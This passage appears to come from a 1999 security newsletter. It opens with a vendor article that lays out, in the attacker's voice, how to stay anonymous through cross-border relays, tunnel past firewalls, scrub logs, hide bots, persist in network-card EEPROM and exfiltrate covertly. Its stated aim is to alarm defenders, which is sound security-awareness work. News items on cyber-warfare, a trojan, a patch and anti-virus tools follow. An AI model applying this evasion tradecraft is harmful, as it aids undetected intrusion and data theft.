broadcasts from your target, you can build up that traffic pattern information so that you can sneak into the site
undetected.

Another often overlooked source of mapping and reconnaissance information (and break-ins) is the management systems
the ISP may be maintaining. The Simple Network Management Protocol (SNMP) that most of these systems use is a bit
too simple and is ripe with vulnerabilities, rich with information (including complete remote sniffers useable to
pick up passwords in some RMON MIB equipment) and lame about security.

The most powerful relay base for attacks is the ISP's router system. Once you control the paths of your target's
packets, you really have them at your mercy, as you can silently redirect any of their traffic to your attack
relay bases without them knowing, and other fun tricks. However, most ISPs guard their Ciscos and other routers
as the most valuable resource with the most defenses, so this is really a target for the most daring and brilliant
attacks.

B) Vulnerability Identification

The objective of the mapping phase is to find externally accessible traffic paths into your target's net systems.
Over the last year it has been easy to see what are the most popular scriptware for the so called script-kiddies:
the low-tech, mostly teen, hackers who just download pre-compiled exploits and run it blindly against targets.
The standard script-kiddy technique is to set up a broad address sweep broadcast of probe traffic, to the whole
section of the Internet that seeks some sort of response from the target, that would indicate that software is
installed with the vulnerability the exploit is using.

The classic vulnerabilities that we frequently see sweeps for are:

o FTP Server Exploits. Especially vulnerable are servers with anonymous write access.
o NFS and SMB share vulnerabilities.
o Holes in POP and IMAP mail delivery servers.
o Vulnerabilities in the "bind" name daemon software.
o Web server CGI exploits (Apache, MS IIS).
o Installed control daemons such as BackOrifice.

The scans for these holes are so common these days that it is difficult for most sites to even catalog origins of
such scans. These kinds of scans are so commonplace that, as long as traffic volume and frequency is controlled, it
is possible to conduct them with relative impunity. But the attacker has to be prepared for the case of zealous
sysadmins who contact ISPs and complain about port-scans. Never port-scan from a node you are not prepared to have
disconnected, seized or otherwise lost. Here, the best policy is to use the least useful and network connected
systems in your attack fleet of controlled systems as they may be lost or jammed and blocked by firewall software
when the hostile mapping probe traffic is detected. Mapping traffic stands out like a sore thumb when pointed at
systems not running the vulnerable software - if the target has the tools to analyze this kind of attack (i.e.
Abacus Sentry). If attacking a net-savvy sysadmin, he will be able to detect things like IMAP probes against
servers not running mail software. However, even these days, targets with effective intrusion detection systems
are few and far between. And sysadmins with enough time to examine, properly and frequently, all their logging
systems are even fewer.

At the sites that have management and security systems, these are ripe targets too. Penetrating the security system
has the best advantage of rendering the target effectively blind. I have seen experienced sysadmins dismiss
unquestionable, hard evidence of tampering because their beloved and trusted, but thoroughly compromised, security
sniffer shows them that there is nothing to worry about - or doesn't even show that kind of data at all. The other
factors in the attacker's favor are the egos of the network designer and IT group. Every sysadmin thinks their
defensive plan is carefully thought out and "their" system couldn't possibly be penetrated. Here at NetSentry we
used to contact operators of systems that had been compromised and were now being used for attacks against us. But
after many hours of fruitless attempts to convince maintenance personnel, who, if you did reach them, often didn't
even understand the attack traffic their own site was launching, insisted that it "couldn't possibly be our system,
it must be your equipment or monitors that are wrong."

I remember very vividly one ISP we contacted: when we were watching, in pretty much real time, as the attackers were
compromising system by system at their site and using each as a base for attacks against us, how their support person
and security specialist looked at some local system when we called and decided that we couldn't possibly be correct.
An hour later, as the ISP's systems being used as attack relays switched from probing to all out denial of service
flooding and attacks, we called back and everyone had happily gone home for the night there. We never did bother to
call them again and as far as we know the attacker still owns all their systems. The only guys who really took one of
our attempts at warnings seriously was the security department at a regional bank, who came in on a Saturday to put
sniffers on the line - but they were a notable exception.

The best targets are those that are the most widely known, used, and difficult to take off-line or re-locate. Mail,
DNS, Web and FTP servers all fall into this category. With these servers, sites that notice suspicious traffic will
often not off-line them because they are critical to network operations. And even if they take them off line and
restore them from backup, or otherwise keep you out, they are often forced to bring the servers back with the same
vulnerability as was available for initial entry because user complaints about the unavailability of network
resources override the attempts to identify and close the hole.

Like penetrating the sniffer and management systems, the mail servers also provide excellent opportunities at
invisibility, by letting you monitor internal conversations, what aspects of the intrusion have been detected and
what countermeasures are being mandated.

C) Penetration

The most successful hack is the one where the target doesn't even know it has been penetrated. The next best thing
is that when the intrusion is detected, they won't know where it's coming from. Since the source may be detected,
it's better to use attack relays so the attacker's anonymity can be maintained. The general technique is to quickly
find some clueless newbie who has put his home system or office server on the net with major vulnerabilities, and
use that as a relay. Never use a system with your name or organization attached to it to attack.

Use several levels of indirection and make sure you cross several geographical and political boundaries to hide your
trail. ISPs in the same country often will not share log information and this gets even more difficult across borders.
I listened with sympathy when I heard a poor overworked security colleague who works for the Canadian RCMP describe
the nine month process (!) for the paperwork to request log files from U.S. ISPs. The police and ISP security
departments often have their hands tied by procedure and policy and general understaffing. The more organizational and
geographic boundaries that your attack redirection trail can cross, the more safe and anonymous you will be.

People complain about the lack of anonymity on the net, but for those that cross that line into unauthorized systems
use, there is altogether too much anonymity. It's often almost impossible to follow a chain of connections through
multiple ISPs and countries. The hidden are truly anonymous on the net. Sysadmins should give up now on the romantic
idea that you will be able to track down who is attacking you - it's just another bunch of random numeric addresses,
and even if you trace it down to an ISP, their logs will only point to another ISP and so on.

If the attacker can knock out the target's intrusion and sniffing facilities then you can proceed the rampage though
their network with relative impunity, but even if you don't have the technology to compromise such systems, there are
a number of techniques you can use to make your attack more stealthy.

Attack Tools: Firewall tunnels. There are a wide variety of virtual private network and proxy programs, which you can
use to relay your traffic to inside a protected network and not make the traffic appear on an intrusion detection
system. Literally dozens of such firewall "borers", such as HTTPtunnel, are available now in source and binary form.
These tunnel programs relay your traffic through the firewall and IDS systems by making it look like innocuous
transfers to and from your "mole" system to common web-sites and other forms of traffic "chameleoning" to make it
look unexceptional. These tunnels embed your attack and control traffic inside this relatively innocent looking
traffic to seem like HTTP or partial TCP fragments. These tunnels can also encrypt your traffic, making it more
difficult for your target to identify the penetration methods.

Most sites employ hard-shell, layered network security. That is to say the links external to the organization have
firewalls and net proxies to restrict access to the inside network. The standard technique is to have a hardened
Demilitarized Zone (DMZ) made up of firewalls and security IDS systems. The most secure sites will have multiple
servers and systems dedicated to these roles, but the majority of installations often rely on one inadequate server
for this gatekeeper function. And once you are through this shell, which is checked most often by maintenance
personnel, you are usually into the internal network that has almost no security. Another often overlooked security
breach is to use floppy based Linux distributions such as the Trinux project, or client software for common Windows
and NT systems, to carry in such a tunnel program physically into the organization where it can be surreptitiously
installed on a system inside the "hard" shell. This "mole" or tunnel can then penetrate the security from the inside
where vulnerabilities are seldom checked. >From this attack relay base, you can proceed to scan the internal systems
and take over other servers, further embedding your control of their infrastructure.

Firewalls are hardened quite well these days. But even so, some firewall operations can be predicted and broken, in
areas like the port number sequences of outbound connections. With predictable sequence number connections, firewall
connections c

  
an be hijacked and attack sequences passed through the defenses. And while firewalls are often tough,
many sysadmins make mistakes and leave vulnerabilities open on the host the firewall runs on (like running Microsoft
IIS on the firewall), allowing penetration and access to both the internal and external Ethernet interfaces on the
box for malicious software to bridge packets between the two. Once the host with network interfaces on both segments
is penetrated, packet hijack software can grab the packet and relay it to the other interface before the firewall
software even sees it, essentially providing you with an invisible back-door into the target.

Some forms of firewall penetration do not even involve bypassing the firewall. One interesting attack technique it
to identify frequently visited sites by the target, taint the DNS database with a forged update to their DNS server
or cache so that the next time the target client contacts the frequently visited site, the traffic is pointed to one
of your attack systems instead. This attack relay system can conveniently embed your attack exploit in relayed copies
of the original web site. With modern Java enabled browsers, the client naively executes any code the supposedly well
known site, which is in reality your attack relay, sends. The data is sent in response to a client's request through
the firewall and walks right past the intrusion detectors, virtually indistinguishable from ordinary data. This
attack mode is also available by taking over the target ISP's router or DNS server.

Other forms of stealth involve penetrating SNMP traffic statistics or nearby systems at their ISP or other peer
clients to identify traffic activity. The design flaw of the Internet that makes identifying forged source addresses
a difficult problem can also let you hide the origin of the attacks (so called "spoofing"). If attack traffic is sent
from (or spoofed to look like) a source that is currently sending a lot of data to the target, it makes it that much
more difficult to spot the attacks. This buries the attack packet amongst reams of other voluminous data. It quickly
scrolls the attack packets off the screen of sniffers and makes network security staff at the other end go through
the tedious "find the needle in the haystack" procedure of sorting and filtering megabytes and megabytes of capture
data if they suspect the attack. Most of the time they will not have the patience to exhaustively search for attacks
by scrolling though the captures and logs, again rendering you invisible.

After penetration, further attack software can be embedded in ordinary traffic to transfer it into the target's
systems. Patience is the key here. The lower the data rate that can be used to get the information in and out, the
lower your chances of being detected are. Spreading out your packets, so only a few per hour are transmitted, makes
your hack very difficult to detect with today's tools. (However, we have developed some special tools to counter
this kind of attack.)

One of the more devious penetration methods we observed was a system that trickled data in and out in the normally
unused padding at the end of user data packets. On normal sniffers and detectors, the packets looked completely
innocent, as even those tools did not display the padding "garbage" used for the hack. This padding was used to
install malicious software by trickling the attack executable into the target a little bit at a time, a few bytes
with every packet.

Another interesting stealthy attack system that will negate most firewalls is to embed your hacking control channel
for your attack bot software and results and information back from the bot in addressing translation requests, that
by definition need to be passed on by firewalls. One such clever system we experienced was an attacker who penetrated
another nearby client node on an ADSL system. They then penetrated one of our systems (a sniffer of all things) and
installed a key-stroke logger that encoded the keystrokes typed at the console into the address field of Address
Resolution Protocol (ARP) lookup messages, which were happily passed through the firewall and relayed to the attacker
at the nearby system outside the firewall on the same subnet that received the ARP encoded keystrokes. This key logger
even delayed, encrypted and grouped keystroke transmissions to make detection more difficult. We have also seen
keyboard loggers that were clever enough to store your keystrokes on disk, in case the system was disconnected from
the network (like a laptop) for a while and then trickled them out later when the net connection was re-established.
Key loggers provide easy access to most authentication tokens, scrambling keys and passwords.

The basic form of penetration is to use stack smashes which take advantage of basic low level coding bugs in a piece
of applications software or an operating system component. The form of a stack smash exploit is to utilize a data
coding that allows variable length data that you send to be erroneously copied into fixed length buffers or variables,
and writing into data past the end of the buffer. Since this data can overrun the stack, you can overwrite a return
address for the currently executing function and make the processors CPU jump to and execute arbitrary code of your
choosing. If the bug exists in a privileged piece of software, these instructions that you jump to are virtually
unlimited, allowing you to do literally anything with the penetrated computer.

The problem with this form of attack is that it often requires detailed knowledge of the operating system and memory
map of the target. Often this form of attack will have to be coded in multiple ways to account even for the version
of OS and software package being penetrated. The drawback for the attacker and the advantage for the defender is that
usually stack smashes involves "groping" around blindly, sending multiple variants with different offsets and values
until the appropriate magic version number that works correctly and responds back is found. In some cases an incorrect
variant can crash software and systems, necessitating lots of patience and long time delays between variants tried.


A common target for stack smashes are recent and older variants of the "bind" name daemon that is in almost universal
use to translate from symbolic DNS names and URLs into numeric IP addresses. The code and traffic structure of this
program is very complicated, difficult to debug and ripe with vulnerabilities and bugs. One 17 year-old hacker managed
to take over more than 12,000 systems over two years - before he was caught with an automated "bind" takeover worm.

Another common form of attack is to exploit the increasingly complex and powerful native data types of applications
software (especially Microsoft products that often contain several complete programming languages in things like word
processors and mail readers). Web server script exploits also fall into this category. The basic technique here is to
either hijack an existing connection and inject malicious data or to send unsolicited attack traffic that will take
over the application and eventually the system.

D) Control

Once you are into the system and have compromised a piece of software, the next bit of work is to get control of the
host. This is usually a bootstrap process, where a piece of small code, "the exploit", is first gotten into the target
and the vulnerability is used to execute the code. This code needs to contact one of your attack relay systems and
download further code and instructions. The simplest form of bootstrap is to allow remote access to a command shell
that can execute arbitrary operating system commands.

There are many forms of bootstraps, as they are often linked to the exploit itself, and some, like BackOrifice,
include a whole command interpreter. But those more advanced download a minimum of code and use existing portions of
the operating system code to build a remote control system attack bot. These advanced exploits can, in object oriented
fashion, build whole parallel network stacks and control systems that run invisibly in the background on the machines
using software already installed on the machine.

A portion of the bootstrap process during attack is to restart or patch the application that was crashed so that the
intrusion is not noticeable. Other important parts of this process include cleaning up the log files to remove
intrusion messages and hiding the attack bot so that it isn't listed in the task viewer or process list. "Scrubbing"
the log files can be easily accomplished by recording the file pointers to important log files at exploit time,
installing and bootstrapping your attack bot and then "rewinding" the log files to their pre-attack positions to
erase any evidence of the installation by overwriting the operating system file pointers in memory with your
pre-attack copies. Subsequent log entries will overwrite the evidence of the attack. Log files to be cleaned up
include sniffer capture files, system event logs, DNS and other daemon diagnostic files, IDS systems files and file
integrity checkers like Tripwire. The good attack bots make log-files almost useless for intrusion detection.

Your attack bot can control the machine up to the privilege level of the software that has been penetrated. It can
access any resource that the original software could. In many cases, this will not include super-user "root" or
"administrator" privileges and you will need to use another local exploit to break in further. One alternative
approach is to download a password cracker and dictionary to be stored in invisible files or unused portions of the
disk and let this cracker run in the background on the machine (invisibly off any task list of course), using a brute
force search for the password on the same machine. This generates little traffic, and is very difficult to detect by
the target, as the machine will work silently to crack the password for you when idle. One such attack system that
was used against us used a remarkably compact word-list and a very patient brute force cracker - to good success.

Super-user privileges are not needed all the time. Even in cases where the cracked software has been limited to
accessing only a few resources, it is often enough to use the system as an attack relay base. One of our attackers
used a "bind" exploit once on a firewall system where we had purposefully confined the non-privileged version of
"bind" program to a "chroot" jail that limited filesystem access to a very small subset of files. This didn't stop
the sophisticated attacker much, as even the ordinary user privilege "bind" already had permission to access both
internal and external Ethernet interfaces and bridge packets between the two to bypass the firewall software.

With careful design, your attack bot can allow you to encrypt, hide, download, remotely install and run arbitrary
software packages, and send traffic so that even sniffers installed on the target do not see the packets. It is
relatively straightforward to insert and remove packets from the network card, transmit and receive queues, so that
normal OS security and logging measures on the penetrated host never even detect the traffic (including bypassing
low-level transmit and receive counters). Similarly, it isn't a major technical feat to hide the bot tasks so that
they don't show up on system diagnostics. You can completely remotely control a machine and run programs on it,
upload and download data, without any indication to the user other than occasional sporadic slowness - which on
Windows is almost indistinguishable from normal performance, and Linux and NT aren't much better.

E) Embedding

After you have gotten in and have control of the target, the next step is ensuring that you can retain control even
if your actions are discovered. You need to quickly map the local net and penetrate any other system suspected of
being a sniffer or key communications links, such as mail servers, to observe any suspicion of intrusion on the part
of the target's IT staff.

The next portion of clean up is to trickle in any additional attack code into the target and whatever is needed to
make your controlling attack bot install and hide itself on disk. The point here is to allow your bot to survive a
system re-boot and retain control so that you do not have to go through the dangerous - and detectable - attack and
clean-up sequence again. Several techniques have been observed for doing this. One is to overwrite existing and
little used OS files that exist in nice, known predictable places/paths, but are seldom used (the more marginal
games that come with OS distributions, and terminal definitions for obscure terminals quickly come to mind for this
purpose). A sophisticated variation on this is to encrypt and spread your binary over many files (sometimes called
steganography). Another alternative that requires more low level programming is to use unused, empty portions of
local disks. The system then has to be modified to re-enable your bot after rebooting.

A variation on this hidden attack bot is to install a back-door that will lie dormant on the disk and install a small,
difficult to detect bot that waits until receipt of a special traffic trigger which will then set off re-assembly from
code pieces spread out on disk files and activation of the more powerful attack relay bot. This kind of traffic
trigger system could also be used to render the traffic invisible. One attack system installed itself across multiple
systems and suspended normal OS operations and triggered execution of the loaded command in the attack bot upon
receipt of a multicast trigger. The OS remained suspended until a time out or reset trigger was received, allowing
the exploit to run without any normal security and logging active. By using a multicast trigger, multiple systems can
be triggered and momentarily suspended simultaneously, and if the control bot is installed on any sniffer systems,
data recording was suspended while the attack bots execute their commands in this suspended state and send their
traffic, again rendering the whole attack invisible. Multicast traffic also has the added advantage of being not
reported in the default configuration of most sniffers, so unless the IT staff explicitly enables reporting, they
will not usually be aware of it. This kind of attack is very difficult to detect unless an operator is paying very
close attention to traffic LEDs.

One condition for the attacker to plan for is what happens to your bot if it is discovered. One attacker once used
a system that erased itself if it lost contact with the attack relay base for more than a certain period of time, or
if the system was re-booted (as would happen when a system gets off-lined because breaches are suspected). In this
way any evidence was erased whenever a penetration was suspected.

The Perl language, if installed on the target, provides a nice compact way to download very powerful programs with a
minimum of data transferred, and the standard Perl kit includes routines for embedding (hiding) your Perl script into
other binaries.

Another clever exploit is to store a piece of your attack bot bootstrap sequence on the network card itself. Most
modern network cards have 64 bytes (or more) of EEPROM that are used to store the 6 byte hardware MAC address,
leaving the majority of the space unused. More sophisticated server network cards even have more space for
downloadable firmware. The mostly unused network card EEPROM is typically loaded by OS drivers in its entirety -
usually to a fixed address static buffer. A small segment of code could be programmed into the card and executed
from this buffer by an exploit. The advantages to storing a portion of the attack code in the NIC is that it makes
tracing the activity of the exploit difficult for someone trying to reverse engineer the code, and more importantly,
a short program installed here will survive a disk formatting and OS re-install. This kind of exploit will lead to
a lot of head scratching and questions about "How the hell do they keep getting back in after a disk wipe?" at the
target.

F) Data extraction/modification

After you have established control, then you can get on with your nefarious purposes. Typically this will be data
extraction and modification on the target system. On Microsoft systems, the registry and Microsoft's own system
information utility, enable rapid gathering and dense transmission of key system configuration back to your attack
relay. Under Linux, the /proc filesystem provides the most rapid clues as to system configuration, allowing your
attack bot to build a summary of what it found on the newly penetrated server and transmit it to the relay.

Important attributes of data extraction and control of modifications for attack bots are to hide and encrypt this
data stream. It will be beneficial to spread these transmissions out over several relay destinations and have them
happen at low rates. One of the safer, stealthier data extraction systems is to embed the data in HTTP web transfers
that make up a large percentage of most site traffic these days. Putting your encrypted data deep into packets and
disguising it as JPEG or GIF binary data will help hide it. Most traffic loggers and sniffers usually capture only
the beginning of most packets, so embedding your data deep into the packet will make it all that much more difficult
to see, depending on what security tools your target is equipped with.

As was mentioned above ARP and DNS also provide methods of hiding your data transmissions. A key piece of information
on the path to hiding your attack bot data traffic amongst the target's traffic is understanding your target's traffic
patterns. You need to know when, how (what protocol) and who the target is talking to. Both Linux/Unix and Windows
come with some pre-made system tools that you can use to record these traffic patterns, without downloading much
additional software. The more sophisticated network cards under Windows come with RMON and other MIBs that can be
used to gather traffic pattern information, so that your traffic can be spoofed and modified to look like client
traffic requested by users at the target site. RedHat Linux contains many pre-installed mapping tools including
arpwatch and SNMP that can be used to monitor local traffic to see what kinds of traffic will likely escape detection
Penetrations of the target's ISP to get traffic stats can be a boon here too.

Another important kind of data hiding is to send your data in little bursts, and follow that data with a burst of
legitimate addressing or ARP traffic to scroll your attack data off the display screen of any sniffers in case you
encounter a fairly quiet traffic level at the target's system. Doing this kind of data transmission in the wee hours
of the morning will also lower the chances that there are any humans looking at status screens at the network control
center and noticing anomalies.

G) Attack Relay

The final step in attacking is to successfully use your new system as a relay base for other attacks. Building up a
large "fleet" of attack bases is its own reward - with more systems to attack from your subsequent conquests will be
more stealthy and difficult to track. But now your target relay site will likely notice if you start port-scanning
"trantor.army.mil" or other such contentious targets, so be careful (this is another real-life example scenario used
on us here). Most sysadmins will not take kindly to the possibility of getting phone calls from the U.S. military
asking why their servers are attacking them. But then again, most won't notice.

Attack-Tool: One clever exploit a hacker used on one of the "honey-pot" decoy systems we use as hacker-bait for
analysis was an SNMP triggered attack reflector. This system used two SNMP triggers to effectively hide the out-bound
attacks. The first trigger put the system into listen mode. After sending the trigger, the attacker quickly sends a
spoofed attack packet containing the attack to the relay system. The spoofed attack packet is coded to look like a
packet from the attack destination to the relay. Upon receipt of the second SNMP trigger and after a delay, the
recorded attack packet is sent back to the actual attack target with the original source and destination reversed.
In this way the sequence of the attack is seemingly reversed, with the local relay system responding with a single
packet after receipt of the single packet from the target. Unless you look carefully on most sniffers and IDS
systems, it looks like the target is attacking the relay system instead of the other way around.

A good ploy to avoid detection is to use many different attack relay or mapping systems and to avoid using the same
attack relay system twice in the same day or week with a particular target. An isolated packet here and there destined
for a strange system will not arouse many suspicions, but repeated transmissions to the same target could possibly
trigger off alarms at the relay or target - however unlikely that may be with most sysadmins asleep at the security
wheel.

Conclusion

I hope the above attack techniques scare any sysadmins reading this. As they should. Too many people these days feel
that security is keeping out the script-kiddies or installing a firewall. There are a lot of nastier things out there
on the net than the mindless script-hordes, so beware. I hope you can use this article to justify better security
measures to your boss. This stuff is out there - it's been used on us. Odds are these kinds of exploits have been
used on you and you have no knowledge of it. There are malicious minds developing new attack bots, and communities
of people dedicated to the breaching of security measures. I would even surmise that there are now organized and
funded efforts on the part of military and intelligence agencies to further develop such offensive software. One of
these days, organized crime may even wake up to this. As we are discovering, it's the law of the jungle out there on
the Net, and there are few places to turn to for assistance in case you get some malicious bozo attacking you. Often
you are left to your own devices, and with little support from your own organization, that may be technically
illiterate when it comes to network security. The only defense seems to be to stay technologically ahead of the
attackers - a constant and resource intensive process. The good news is that it's easier to play defense than
offence. Good luck.

P.S. You do have good backups, don't you?


@HWA

43.0 TAIWAN CIRCLES WAGONS IN CYBER-WARFARE
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/

by Thejian, Thursday 26th August 1999 on 11:40 pm CET
A senior Ministry of National Defense official wednesday said that Taiwan is capable
of defending itself from an information technology attack by China, but will not itself
provoke a cyber war. The ministry has also set up a special task force to oversee the
island's information warfare strategy, said the director of the ministry's Electronic
Communications and Information Bureau. "China has put a lot of effort into building up
its information capabilities in the past decade," Lin said. He added that Beijing has
conducted a few military exercises to test its information warfare development. "But
Taiwan is also working on it. We are not as fragile as many people think," he said.
Read more below


From Infowar.com

http://www.infowar.com/mil_c4i/99/mil_c4i_082599c_j.shtml

China: Taiwan Circles Wagons In Cyber-warfare.

A senior Ministry of National Defense official said yesterday that Taiwan is capable of defending itself from an information technology attack by China,
but will not itself provoke a cyber war.

The ministry has also set up a special task force to oversee the island's information warfare strategy, said Lin Ching-ching, the director of the ministry's
Electronic Communications and Information Bureau. "China has put a lot of effort into building up its information capabilities in the past decade," Lin
said. He added that Beijing has conducted a few military exercises to test its information warfare development. "But Taiwan is also working on it. We
are not as fragile as many people think," he said.

A power outage that plunged four-fifths of the island into darkness on July 29 intensified Taiwanese people's fear of a Chinese military attack. But while
those fears have gone unrealized, cross-strait tensions continued to rise in early August as hackers from both sides of the strait broke into each other's
government websites to post provocative slogans and national flags.

The Internet battle also raised public questions as to whether Taiwan has the capability to handle what will be a future trend - information warfare which
is widely viewed as a major challenge to the island's information technology.

Lin allayed such concerns, saying that Taiwan has the ability to counter China's information attack and has set up a military information warfare strategic
policy committee as the highest decision-making body on the issue.

Lin said that none of the island's computer systems broke down during the blackout. Generally, man-made mistakes cause 70 percent of computer
breakdowns on the island, he said.

"We have realized that killing viruses is not our top priority and a crisis-solving center should be established," he said. But because Taiwan has a limited
national defense budget, everything must be cost-effective, said Lin.

According to Webster Chiang, the vice chairman of the Cabinet's Research, Development and Evaluation Commission, the maintenance and
development of information protection systems accounts for only one percent of the national budget.

Chang Kwang-yuan, director of the information division at the National Security Bureau, said the bureau had tracked down 165 websites as the
sources of hacking by mainland Chinese on August 7. He said the some of the websites were found to be government-operated but declined to identify
whether the intrusions were orchestrated by the Chinese government or individual hackers.

Tang Yao-chung, an information science professor at National Taiwan University, suggested that the government devote more effort to the
development of Taiwan's offensive computer warfare capabilities. "Developing coding abilities is a profitable business and should be done by private
companies," said Tang. "But decoding and building offensive strategies are the government's responsibilities."

Lin said he does not encourage provoking China by Internet hacking, but said Taiwan is capable of standing firmly.

"On a legal basis, we don't encourage taking the offensive, although we do have the ability to handle any offensive aggression by China," said Lin. The
cross-strait cyber war is likely to continue as more websites from both sides are hacked. While Taiwan is focusing on more military purchases, the
incident provided a chance for Taiwan to re-examine its information security.

ASIA INTELLIGENCE WIRE
CHINA NEWS 17/08/1999


@HWA

44.0 UK WEBHOSTING COMPANY HIT BY VIRUS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/

by Thejian, Thursday 26th August 1999 on 11:15 pm CET
UK-based Web hosting and development company Fortune Cookie Digital Media was
subject to an attack by the Backdoor-G trojan yesterday, affecting approximately 10
percent of the sites hosted according to the company. Full story

http://www.idg.net/idgns/1999/08/26/UKWebHostingCompanyHitBy.shtml

U.K. Web hosting
company hit by virus
by Douglas F. Gray, IDG News Service\London Bureau
August 26, 1999

U.K.-based Web hosting and development
company Fortune Cookie Digital Media was
subject to an attack by a "Trojan horse"
virus yesterday, affecting a number of Web
sites hosted by the company.

Approximately 10 percent of the sites
hosted by the company were infected with
the virus, according to Justin Cooke, founder
and managing director of Fortune Cookie.
Earlier media reports quoted Cooke as
stating the number as 30 percent, a figure
which he now states was "probably an
overestimation because [the situation] was
still going on."

The Trojan horse virus, called BackDoor-G,
provided access to passwords that uploaded
a second virus to the Web server, which
then infected certain default documents,
including default.htm and index.html,
according to a press release issued by the
U.K. company.

Cooke admitted that some of the Web sites
affected by the virus belonged to
"small-to-medium companies," but he
refused to name them.

The company release claimed that "all
affected Web sites were returned to normal
operation" within 20 minutes.

Fortune Cookie, in London, can be reached
at http://www.fortune-cookie.com/.

@HWA

45.0 NETSCAPE ISSUES WEB-SERVER FIX
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/


by Thejian, Thursday 26th August 1999 on 10:50 pm CET
Netscape and ISS X-Force have issued a patch for the buffer overflow problem in the
Netscape Enterprise and FastTrack servers. ".. an attacker can exploit the
vulnerability and remotely upload and execute arbitrary assembly language. An
attacker can write an exploit to get the computer to do what ever they want.."
according to X-Force director Chris Rouland. Infoworld has a story, Iplanet has a
patch.
http://www.iplanet.com/downloads/patches/detail_12_86.html

@HWA

46.0 CWI CRACKS 512 BIT KEY
~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/


by Thejian, Thursday 26th August 1999 on 10:20 pm CET
Researchers of the CWI in Amsterdam, Holland, today announced that they have
been able to crack a 512 bit code. This ones more proves that this standard, which is
still used on the Internet for e-commerce transactions a lot, just doesn't cut it. The
technology they used (besides 300 workstations and Pentium II's :) will enable them
to crack any 512 bit code in the future according to CWI.

@HWA

47.0 MOUNTING AN ANTI-VIRUS DEFENSE
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/


by Thejian, Thursday 26th August 1999 on 10:00 pm CET
With computer viruses on the rise, and in the wake of the 'Melissa' incident, anti-virus
software becomes a part of the security arsenal. What's needed to keep the viruses
out? Some firms present their ideas and solutions in this article.

Mounting an anti-virus defense

With computer viruses on the rise, and in the wake of the
'Melissa' incident, anti-virus software becomes a part of the
security arsenal

By Heather Harreld

Anti-virus software, which often was viewed as the
security stepchild to sibling powerhouse technologies
such as intrusion detection and firewalls, has been
elevated to a new market status following the
"Melissa" virus, which in March infected machines
worldwide via e-mail.

Once sold mainly as a single desktop solution -
which users often labored to disable or bypass -
anti-virus software is being bundled with other
security solutions designed to secure entire
enterprises from security threats. Anti-virus software
has emerged as an integral component of agency
security efforts because viruses are more easily
transmitted in today's networked world, and the viral
breeding ground of the Internet has spurred
phenomenal virus growth.

Although the majority of viruses in 1997 were
transmitted by floppy disks, the major source of virus
infections today are from e-mail attachments, which
can be used to spread a virus at alarming speed. The
Melissa virus affected more than 100,000 machines
worldwide in just days by seizing users' computers
and e-mailing copies of itself to the first 50 names in
the e-mail address book.

In 1986, there was one known computer virus; in
1990 that number had jumped to 80. From
December 1998 to January 1999, the total virus
count jumped from 20,500 to 36,500. Today, there
are about 45,000 computer viruses in existence, with
new ones appearing every day.

"A lot of the virus attacks...are starting to blur the lines between [a virus or a
vulnerability?]" said Sal Viveros, group product manager for Network
Associates Inc.'s Total Virus Defense Division.

"It is much easier for a hacker to send an e-mail attachment than it is to
penetrate a firewall. We're seeing more destructive viruses that are hitting
more people."

Network Associates offers an anti-virus package that provides virus
protection spanning the desktop, groupware and gateways, and it also has a
security suite offering anti-virus software coupled with firewalls, intrusion
detection and encryption.

Viveros said the common alerting and reporting mechanisms from the security
suite enable a network administrator to react more quickly to problems. For
example, if a hacker finds an open port and uses it to insert a virus,
intrusion-detection and anti-virus software can work in tandem to provide an
accurate picture of what is happening on a network.

"You're starting to have rules-based reactions," Viveros said. "You're taking
away the need for the network administrator to be sitting there monitoring
those different things when they happen. By setting rules, the different
components are talking to each other."

Symantec Corp. in May announced its Digital Immune System, a strategy to
capitalize on its anti-virus technology, while coupling it with intelligent tools
designed to keep systems running at peak performance. With its anti-virus
software, the company will offer tools for server management, desktop
configuration, remote system operation and disaster recovery - all from a
single console.

Chris Mills, Symantec's product manager for Digital Immune System, noted
that the strategy will include advanced anti-virus management tools that enable
a network administrator to lock down policy requirements on the desktop and
configure virus responses that automatically go into effect upon detection. In
addition, the company plans to add security mechanisms such as e-mail
scanning, Uniform Resource Locator filtering and protection from malicious
Java applets, he added.

"What [customers are] worried about are threats to their enterprise," Mills
said. "It's not strictly an anti-virus concept. We're talking about protecting
your enterprise from unknown threats that will negatively affect your
credibility, your cost and your uptime."

Worldtalk Corp. has bundled multiple security mechanisms into its secure
server product, which is being used by the Energy Department and the Food
and Drug Administration. In addition to a server-based virus detection
solution, the company also offers access control,which regulates who a user
can send e-mail to and receive e-mail from, and encryption controls.

DOE's headquarters used Worldtalk's secure server to begin containing the
potentially devastating Melissa virus before a fix was even discovered for it,
said Charlie Smith, information management consultant at DOE.

Smith said that although many other anti-virus products provide the ability to
disinfect incoming viruses before they are passed on to users, Worldtalk's
server enabled him to program a policy that would target and quarantine any
incoming e-mail with a specific message in its header.

"The quarantine allowed us to really track Melissa," Smith said. "It gave us a
history to trace back to the originator."

Bill Mann, director of product management at Worldtalk, noted that the ability
to program policies into the server also could be used to fend off potentially
damaging mobile code, such as hostile Java applets, that users unknowingly
can download from World Wide Web sites.

"Literally anything that can be done by a program can be done by mobile
code," Mann said. "It can open database connections. It can install viruses on
your PC. Mobile code gives the hackers so much more flexibility than virus
writing."

It is not only traditional anti-virus and computer security companies that are
homing in on technology to combat viruses. Companies targeting the
electronic-commerce market are bundling anti-virus software with other
computer security solutions. In July, Computer Associates International Inc.
introduced its eTrust security solution, which bundles anti-virus technology
with public-key infrastructure technology, encryption controls,
intrusion-detection scanners, firewall components, network surveillance and
authentication tools.

Kurt Ziegler, senior vice president for CA's security business, said the eTrust
network surveillance component is crucial to containing viruses because users
have not always updated their software to detect the latest viruses. Because
these identification delays can de devastating, a containment strategy is crucial,
he said.

"We include some technology that lets you identify movement, to get a
pattern," Ziegler said. "It scans the network on the inside...so you can see a
neighbor sending it to a neighbor inadvertently. Should you get an
identification...you can quickly go back over the that traffic and say who's
carrying what where."

Judith Spencer, director of the Center for Governmentwide Security at the
General Services Administration, said the Melissa virus - combined with other
incidents, such as a hacker group threat to target the federal government - has
helped increase government security awareness. She noted that though
anti-virus software is "indispensable" on systems today, it should be viewed as
only part of an agency's security arsenal.

